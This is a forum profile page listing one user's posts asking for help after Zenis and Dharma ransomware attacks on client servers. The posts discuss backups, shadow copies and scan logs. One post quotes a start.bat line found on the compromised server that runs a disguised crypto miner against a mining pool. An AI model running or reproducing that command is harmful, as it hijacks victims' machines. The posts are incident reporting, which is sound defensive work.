Jump to content


  • Content Count

  • Joined

  • Last visited

Community Reputation

0 Neutral

About milopware

  • Rank
    New Member
  1. oh dear, it says: Dharma (.cezar Family) This ransomware has no known way of decrypting data at this time. so its a good job we had some really good backups as we have recovered pretty much back to full capacity! we are currently using RDP but I think we need to look at alternative ways to get remote users connected, i'm told VPN is the way to go with this but what is best software to use?
  2. Hi you guys were really helpful to me before when one of my clients servers were attacked by Zenis and we were able to recover all data with the help you gave... I have another client who has experienced a Ransomware attack this time the ramsom note is from [email protected] we are in a good position as we stopped the attack before it was able to do too much damage (although it still has caused us a massive cleanup operation) and also we have some very good backups in place so were able to recover everything but of course still costing my client some uncomfortable down time...
  3. it seems my server is under attack again, I have installed Malwarebytes and it picked up the attack before it happened, not sure what the attackers intentions were as data is still encrypted from last attack... I have isolated some more files / folders... it seems the attacker has created 2 user 'profiles' in the Documents & settings directory one called sysyem (not a typo) and the other called support. The 'support' profile has WindowsHelpPanel.exe in the desktop folder & in the My documents / Downloads folder. Also found: C:\WINDOWS\WindowsHelpServices folder containing in
  4. the folder C:\windows\WindowsHelpPanel doesn't exist, would it be useful for me to do a data recovery and attempt to find this .exe file? and doe this mean they have a copy of the malicious file now? (as per your initial comments above on Thursday)
  5. ive just been looking at another one of your cases and saw this about shadow copies: I have managed to recover some shadow copies but the shadowexplorer software doesn't seem to 'see' them, do you have any ideas why this would be? it can see shadow copies created after the event but nothing from the ones that were created before, do they need to be 'mounted' by the system? and is this what you mean about having the hard disk plugged into another machine or booted from a disk?
  6. please find attached the requested files. I have no idea what they are but looking at them could it be possible that the start.bat file has the encryption key in it?... from start.bat file C:\windows\WindowsHelpPanel\svchost.exe -l zec-eu1.nanopool.org:6666 -u t1Ynpy5dBWxuJsDTbYzAfNnuRpwLrX38vqJ/MindFlyer/[email protected] -p x and is this where it was emailed to? is there a way of determining which program was used to encrypt the files? im guessing there is a finite number of programs so is there a way of telling by looking at one of the encrypted files? I think the
  7. Thanks for coming back to me, I have downloaded scanner and results are attached Addition.txt FRST.txt
  8. I did this and got the following: This ransomware is still under analysis. Please refer to the appropriate topic for more information. Samples of encrypted files and suspicious files may be needed for continued investigation Not enough information is public about Zenis. Please check back later. Does this mean i've had a zero hour attack?
  9. Hi all i'm hoping someone can help me work out which ransomware has encrypted my files as the method / ransom note etc doesn't seem to match anything in the decryption software assistance page... my documents have all been renamed, all names are different, for example these files were .jpg but now called Zenis-0b.0bUMIAhxyu6B / Zenis-0E.0EjBzgesopM2 / Zenis-2q.2qYIjYnApmsC the ransom note is a html doc called Zenis-instructions.html as below: I have a feeling the <small hidden> text at the bottom could be the encryption key used just looks a bit random? can anyone hel
  • Create New...